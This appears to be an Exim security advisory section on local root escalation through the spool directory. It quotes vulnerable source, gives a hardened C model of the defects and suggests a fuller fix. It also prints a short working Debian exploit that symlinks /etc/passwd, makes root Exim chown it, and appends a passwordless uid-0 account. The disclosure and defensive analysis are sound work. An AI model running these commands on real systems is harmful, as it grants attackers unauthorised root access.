========================================================================
CVE-2020-SPDIR -- Assorted attacks in Exim's spool directory
========================================================================

Exim also operates as root in its spool directory, which belongs to the
"exim" user. An attacker who has obtained the privileges of the "exim"
user can exploit this local vulnerability to obtain full root privileges.
Several attack vectors exist:

- The attacker can write to a spool header file (in the "input"
  subdirectory) and reuse our exploitation technique for CVE-2020-NLEND.

- The attacker can create a file with a long name in the "db"
  subdirectory and overflow a stack-based buffer (at line 208): the name
  returned by readdir() can be up to 255 bytes, but Ustrcpy() copies it
  into the 256-byte filename[] after the "<spool>/db/" prefix, without
  any bounds check:

 87 open_db *
 88 dbfn_open(uschar *name, int flags, open_db *dbblock, BOOL lof)
 89 {
 ..
 94 uschar dirname[256], filename[256];
...
111 snprintf(CS dirname, sizeof(dirname), "%s/db", spool_directory);
112 snprintf(CS filename, sizeof(filename), "%s/%s.lockfile", dirname, name);
...
198   uschar *lastname = Ustrrchr(filename, '/') + 1;
199   int namelen = Ustrlen(name);
200
201   *lastname = 0;
202   dd = opendir(CS filename);
203
204   while ((ent = readdir(dd)))
205     if (Ustrncmp(ent->d_name, name, namelen) == 0)
206       {
207       struct stat statbuf;
208       Ustrcpy(lastname, ent->d_name);

- The attacker can create a symlink (or a hardlink) in the "db"
  subdirectory and make root hand ownership of an arbitrary file to the
  "exim" user (at line 212): the prefix comparison at line 205 matches
  any entry whose name starts with the database name, Ustat() follows
  the link, and Uchown() then changes the owner of its target:

204   while ((ent = readdir(dd)))
205     if (Ustrncmp(ent->d_name, name, namelen) == 0)
206       {
207       struct stat statbuf;
208       Ustrcpy(lastname, ent->d_name);
209       if (Ustat(filename, &statbuf) >= 0 && statbuf.st_uid != exim_uid)
210         {
211         DEBUG(D_hints_lookup) debug_printf_indent("ensuring %s is owned by exim\n", filename);
212         if (Uchown(filename, exim_uid, exim_gid))

For example, on Debian (spool directory /var/spool/exim4), as the "exim"
user:

cd /var/spool/exim4
cd db/
rm -f retry*                             # leave no other "retry*" entry for the prefix match
ln -s -f /etc/passwd retry.passwd        # name starts with "retry"; target is owned by root
echo | /usr/sbin/exim4 postmaster        # root Exim opens the retry database and chowns the target to exim
echo 'fullroot::0:0::/:' >> /etc/passwd  # /etc/passwd now belongs to exim: add a passwordless uid-0 account
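The two defects in the loop above (the unbounded copy at line 208 and the
link-following stat/chown at lines 209-212), modelled outside Exim as an
added example. This is not Exim's code and the hardened checks are this
note's suggestion, not Exim's actual fix; the spool path /var/spool/exim4
and the scratch directory under /tmp are assumptions. The self-check
builds a regular file, a symlink to it and a hard link to it and confirms
that the classifier tells them apart.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define PATHBUF 256        /* same size as Exim's dirname[256] / filename[256] */
#define NAME_MAX_LINUX 255 /* longest d_name readdir() can return on Linux */

/* Model of dbfn_open()'s path construction: fill filename with
 * "<spool>/db/<name>.lockfile" and return the offset of its last path
 * component (what Exim calls "lastname"). Not Exim's code. */
size_t lockfile_path(char *filename, size_t cap, const char *spool, const char *name)
{
    char dirname[PATHBUF];
    snprintf(dirname, sizeof dirname, "%s/db", spool);
    snprintf(filename, cap, "%s/%s.lockfile", dirname, name);
    return (size_t)(strrchr(filename, '/') + 1 - filename);
}

/* Defect 1: Ustrcpy(lastname, ent->d_name) has no bound. Compute how many
 * bytes such a copy would write past the end of filename[] for a given
 * entry name, without performing it. 0 means the copy fits. */
size_t overflow_bytes(const char *spool, const char *name, const char *d_name)
{
    char filename[PATHBUF];
    size_t last = lockfile_path(filename, sizeof filename, spool, name);
    size_t need = last + strlen(d_name) + 1;   /* +1 for the terminating NUL */
    return need > sizeof filename ? need - sizeof filename : 0;
}

/* Hardened copy: refuse an entry that does not fit instead of trusting
 * readdir() to return something short. Returns 1 and completes the path,
 * or 0 and leaves the path truncated to the directory. */
int append_entry_bounded(char *filename, size_t cap, size_t last, const char *d_name)
{
    size_t len = strlen(d_name);
    if (len + 1 > cap - last) {
        filename[last] = '\0';
        return 0;
    }
    memcpy(filename + last, d_name, len + 1);
    return 1;
}

enum db_entry_verdict { DB_ENTRY_OK = 0, DB_ENTRY_MISSING, DB_ENTRY_SYMLINK,
                        DB_ENTRY_NOT_REGULAR, DB_ENTRY_HARDLINKED };

/* Defect 2: Ustat()/Uchown() follow symlinks, and chown through a hard
 * link changes the owner of the shared inode. Decide with lstat() whether
 * an entry is a plain, singly-linked regular file before any chown. */
enum db_entry_verdict classify_db_entry(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0) return DB_ENTRY_MISSING;
    if (S_ISLNK(st.st_mode)) return DB_ENTRY_SYMLINK;
    if (!S_ISREG(st.st_mode)) return DB_ENTRY_NOT_REGULAR;
    if (st.st_nlink > 1) return DB_ENTRY_HARDLINKED;
    return DB_ENTRY_OK;
}

/* Self-check on a scratch directory (assumed writable under /tmp): returns 1
 * if the classifier separates a regular file, a symlink and a hard link,
 * 0 if it does not, -1 if the scratch files could not be created. */
int demo_fs_checks(void)
{
    char dir[] = "/tmp/spdir-demo-XXXXXX";
    char reg[64], sym[64], hard[64];
    int ok = -1;

    if (!mkdtemp(dir)) return -1;
    snprintf(reg, sizeof reg, "%s/retry", dir);
    snprintf(sym, sizeof sym, "%s/retry.passwd", dir);
    snprintf(hard, sizeof hard, "%s/retry.hard", dir);

    FILE *f = fopen(reg, "w");
    if (f) {
        fclose(f);
        int plain_ok = classify_db_entry(reg) == DB_ENTRY_OK;   /* checked before linking */
        if (symlink(reg, sym) != 0 || link(reg, hard) != 0)
            ok = -1;
        else
            ok = plain_ok
              && classify_db_entry(sym) == DB_ENTRY_SYMLINK
              && classify_db_entry(hard) == DB_ENTRY_HARDLINKED;
    }
    unlink(hard); unlink(sym); unlink(reg); rmdir(dir);
    return ok;
}

int main(void)
{
    char longname[NAME_MAX_LINUX + 1];
    memset(longname, 'A', NAME_MAX_LINUX);
    longname[NAME_MAX_LINUX] = '\0';
    printf("overflow for a 255-byte entry: %zu bytes\n",
           overflow_bytes("/var/spool/exim4", "retry", longname));
    printf("filesystem self-check: %d\n", demo_fs_checks());
    return 0;
}
```

The lstat()-then-chown() sequence still leaves a window in which the entry
can be swapped; a complete fix would open the entry with O_NOFOLLOW and
call fchown() on the descriptor, so that the object checked is the object
changed.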

Last-minute note: CVE-2020-LFDIR and CVE-2020-SPDIR are very similar to
https://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/.

